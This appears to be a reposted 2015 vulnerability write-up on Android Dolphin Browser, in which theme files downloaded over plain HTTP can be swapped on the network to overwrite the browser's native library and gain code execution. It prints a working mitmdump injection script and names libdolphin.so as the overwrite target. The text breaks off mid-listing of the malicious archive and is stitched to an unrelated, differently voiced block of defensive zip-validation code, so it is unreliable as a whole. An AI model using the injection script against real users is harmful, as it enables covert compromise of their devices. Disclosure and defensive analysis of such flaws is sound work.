Android Dolphin Browser remote code execution vulnerability warning - myhack58

ID MYHACK58:62201566162
Type myhack58
Reporter Anonymous
Modified 2015-08-25T00:00:00


An attacker who can control the network traffic of Android Dolphin Browser can tamper with the browser's "download and apply a new theme" feature. Through this feature the attacker can write arbitrary files, and in the browser's environment on the user's device those files turn into code execution. The only thing the user has to do during the whole attack is select, download and apply a theme. As of 27 July 2015, Google Play data showed that Dolphin Browser had over 1 million downloads.

Vulnerability analysis

The Android version of Dolphin Browser has a feature that lets the user personalize the browser by downloading and applying themes. When the user selects a new theme, the theme is downloaded over plain HTTP with a GET request.

The theme file is saved to the following location:

    root@hammerhead:/sdcard/Download # ls
    Red_roof.dwp

The extension "dwp" is only Dolphin Browser's own custom extension; the file is actually a plain zip archive:

    $ file Red_roof.dwp
    Red_roof.dwp: Zip archive data, at least v2.0 to extract

Listing its contents shows the data used to apply the theme:

    $ unzip -l Red_roof.dwp.orig
    Archive:  Red_roof.dwp.orig
      Length      Date    Time    Name
    ---------  ---------- -----   ----
        18165  12-18-14 09:57   icon.jpg
          237  12-19-14 14:35   theme.config
       131384  12-18-14 09:54   wallpaper.jpg
    ---------                     -------
       149786                     3 files

We then reverse engineered the select / download / apply process and found that the apply step unzips the theme file and applies the configuration it contains.

Exploit

To exploit this, the first step is to proxy the download traffic and inject a modified theme. For that we configured a proxy on the test device and wrote a simple inline script for mitmdump (the theme server hostname is not given in this write-up):

    from libmproxy.protocol import http
    from netlib import odict

    # Hostname of the theme download server (not given in this write-up).
    THEME_HOST = ""


    def request(context, flow):
        # Only intercept requests for theme files (.dwp) from the theme server.
        if not flow.request.host == THEME_HOST \
                or not flow.request.path.endswith(".dwp"):
            return

        # Build response
        response = http.HTTPResponse(
            [1, 1], 200, "OK",
            odict.ODictCaseless([["Content-Type", "application/zip"]]),
            "yo!")

        # Inject theme: replace the body with the modified archive
        with open("Red_roof.dwp", "rb") as f:
            modified = f.read()
        response.content = modified
        response.headers["Content-Length"] = [str(len(modified))]

        # Return response
        flow.reply(response)

We also had to work through the browser's theme decompression process; since this is a common situation, we do not elaborate on it here.

The first verification injects the modified theme into the download response and successfully writes an arbitrary file into the Dolphin Browser data directory. To gain code execution we then need to find a file we can overwrite. A quick look around turned up a native library in the files directory, libdolphin.so:

    root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser # cd files/
    root@hammerhead:/data/data/mobi.mgeek.TunnyBrowser/files # ls
    AppEventsLogger.persistedevents
    EN
    icons_cache
    libdolphin.so
    name_service
    splash.on

This looked like a gift from the sky: it lets us write a complete code-execution payload. So I produced a corresponding payload:

    $ unzip -l Red_roof.dwp
    Archive:  Red_roof.dwp
      Length      Date    Time    Name
    ---------  ---------- -----   ----
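The write-up shows a theme archive fetched over plain HTTP being unpacked into the app's data directory with no check on its entries. As an added, defender-side example (not code from the write-up or from Dolphin Browser), here is the validation a .dwp extractor should perform before applying a theme: every entry must resolve inside the theme directory and must be one of the three members seen in the listing above. The sample archives, the `theme` directory name and the hostile `../../files/libdolphin.so` entry are constructed for this demonstration.

```python
import io
import os
import tempfile
import zipfile

# Members a genuine theme archive carries, per the `unzip -l Red_roof.dwp`
# listing above; a .dwp containing anything else is refused.
ALLOWED_MEMBERS = {"icon.jpg", "theme.config", "wallpaper.jpg"}


def unsafe_reason(member, dest_dir):
    """Why `member` must not be extracted into dest_dir, or None if it may be."""
    dest_dir = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest_dir, member))
    # A "../" entry or an absolute name resolves outside the theme directory.
    if os.path.commonpath([dest_dir, target]) != dest_dir:
        return "escapes theme directory"
    if member not in ALLOWED_MEMBERS:
        return "not a theme member"
    return None


def scan_dwp(data, dest_dir="theme"):
    """List every (member, reason) in a .dwp that the browser should refuse."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    return [(n, r) for n in names if (r := unsafe_reason(n, dest_dir))]


def apply_theme(data, dest_dir=None):
    """Extract only if the whole archive passes; return files written, else None."""
    dest_dir = dest_dir or tempfile.mkdtemp(prefix="dwp_")
    if scan_dwp(data, dest_dir):
        return None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest_dir)
    return sorted(os.listdir(dest_dir))


def build_dwp(members):
    """Constructed sample: zip {name: bytes} into an in-memory .dwp archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples: a benign theme and one carrying a traversal entry
# aimed at the browser's native library.
GOOD_THEME = build_dwp({"icon.jpg": b"\xff\xd8", "theme.config": b"name=Red_roof",
                        "wallpaper.jpg": b"\xff\xd8"})
BAD_THEME = build_dwp({"theme.config": b"x", "../../files/libdolphin.so": b"\x7fELF"})
```

The traversal check comes before the allowlist check, so a hostile entry is reported for where it would land rather than merely for its name.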
